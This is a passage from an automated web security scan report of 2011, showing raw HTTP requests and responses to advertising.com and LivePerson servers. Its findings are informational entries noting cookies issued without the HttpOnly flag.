GET /site=789981/size=728090/u=2/bnum=73612408/hr=13/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.imdb.com%252Fimages%252FSF99c7f777fc74f1d954417f99b985a4af%252Fa%252Fifb%252Fdoubleclick%252Fexpand.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=pH430013111733250028; aceRTB=rm%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Cam%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Cdc%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Can%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Crub%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7C; A07L=3DM2reol9thECsRTmmuji_6yZBuTfBAd8OCZMhF9rk8jCf_-UPHfh8A; GUID=MTMxMzE5ODMwNTsxOjE3NGJrNzAwYWI2NjZtOjM2NQ; C2=BeTSOlLuFYRxG4Jq5EwFbZwaq+WAsVmRSjKOAMxWGRGtbLQtuaMGKMtrGDNZjMrxQLoIH0bSFl2moVmfzZUozS+B8pqRpVmfqaUoSK8BItdh4eQ3WXIuwaHCW8oxIBK9IU1IGCF; F1=BE4NJ5kAAAAA9iCDAEAAgEABAAAABAAAAEAAgEA; BASE=6cQnzlHYhoShvR1ceK3XL5aycYSYS86phwGH+KypTDXy5bPKnWShBX+I1kY4koT2wF0GVGuvu9AwwtMNvfiwMKCK3FXHo6CDdE4k8Ac0L0vPHOjgv1X3VKLkc5jIoT3KrQ0dlev7c4Q7TtKXkwoTyzZpoD5kIIWMw6pKXumJxaAylsrGPflwlzGZJOqJpfNI/gxASKU+TQ1nZ+L78EymLnA!; ROLL=jTgYEkXLjqa4aJBDIcb3d6zVdS4qvatzUjH3Pi0QjhhuPM9d8fW31EAB/MYISDOnqNIptoFV6jtmADHvDwkEA/5Fw5NB03P!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.973593.789981.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 15 Aug 2011 18:41:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:41:27 GMT
Content-Length: 1047
Connection: close
Set-Cookie: C2=XhWSOlLuFYRxGPJq5EwFbZwaq+WAsVmBIjKOAMxWGoFtbLQtuaoDKMtrGaMZjMrhGLoIH0bSF81moVmfzZwlzS+B8pqBfVmfqawlSK8BItdRueQ3WXkrwaHCW8oh+AK9IU1IGZE; domain=advertising.com; expires=Wed, 14-Aug-2013 18:41:26 GMT; path=/
Set-Cookie: F1=BcFaJ5kAAAAAd3ADAEAAgEgAAAAA9iCDAEAAODABAAAABAAAAIAAODA; domain=advertising.com; expires=Wed, 14-Aug-2013 18:41:26 GMT; path=/
Set-Cookie: BASE=6cQnylHYhoShvR1ceK3XL5aycYSYS86phwGH+KypTDXy5bPKnWShBX+I1kY4koT2wF0GVGuvu9AwwtMNvfiwMKCK3FXHo6CDdE4k8Ac0L0vPHOjgv1X3VKLkc5jIoT3KrQ0dlev7c4Q7TtKXkwoTyzZpoD5kIIWMw6pKXumJxaAylsrGPflwlzGZJOqJpfNI/gxASKU+TQ1nZ+L78EymLnAW4DkJw8N!; domain=advertising.com; expires=Wed, 14-Aug-2013 18:41:26 GMT; path=/
Set-Cookie: ROLL=jTgYEkXLjqa4aJBDIcb3d6zVdS4qvatvUjH3ic0QjhhuPM9d8fW31EAB/MYISDOnqNIptoFV6jtmADHvDwkEA/5Fw5NB03P!; domain=advertising.com; expires=Wed, 14-Aug-2013 18:41:26 GMT; path=/
Set-Cookie: 73612408=_4e496857,3023863148,789981^973593^65^0,0_; domain=advertising.com; path=/click

document.write('<iframe src="http://view.atdmt.com/CNT/iview/286710723/direct;wi.728;hi.90/01/3023863148?click=http://r1-ads.ace.advertising.com/click/site=0000789981/mnum=0000973593/cstr=73612408=_4e
...[SNIP]...

8.53. http://sales.liveperson.net/hc/76226072/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/76226072/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/76226072/?visitor=&msessionkey=&site=76226072&cmd=knockPage&page=http%3A//www.wireless.att.com/cell-phone-service/packages/free-packages.jsp%3Fsource%3DECWD000000000000O&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=1313432467768&javaSupport=true&id=5971605190&scriptVersion=1.1&d=1313432469797&title=Free%20Phone%20Deals%20and%20Packages%20-%20Shop%20-%20Wireless%20from%20AT%26T&referrer=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: LivePersonID=-546022977410-1313431914:-1:-1:-1:-1; HumanClickKEY=7991325949139639887; LivePersonID=LP i=546022977410,d=1312768968; HumanClickACTIVE=1313431908597

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:22:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1313432576322; expires=Tue, 16-Aug-2011 18:22:56 GMT; path=/
Content-Type: image/gif
Last-Modified: Mon, 15 Aug 2011 18:22:56 GMT
Cache-Control: private
Set-Cookie: HumanClickSiteContainerID_76226072=Master; path=/hc/76226072
Set-Cookie: LivePersonID=-546022977410-1313431914:-1:-1:-1:-1; expires=Tue, 14-Aug-2012 18:22:56 GMT; path=/hc/76226072; domain=.liveperson.net
Content-Length: 34

GIF89aZ............,...........L.;

8.54. http://sales.liveperson.net/hc/76226072/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/76226072/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request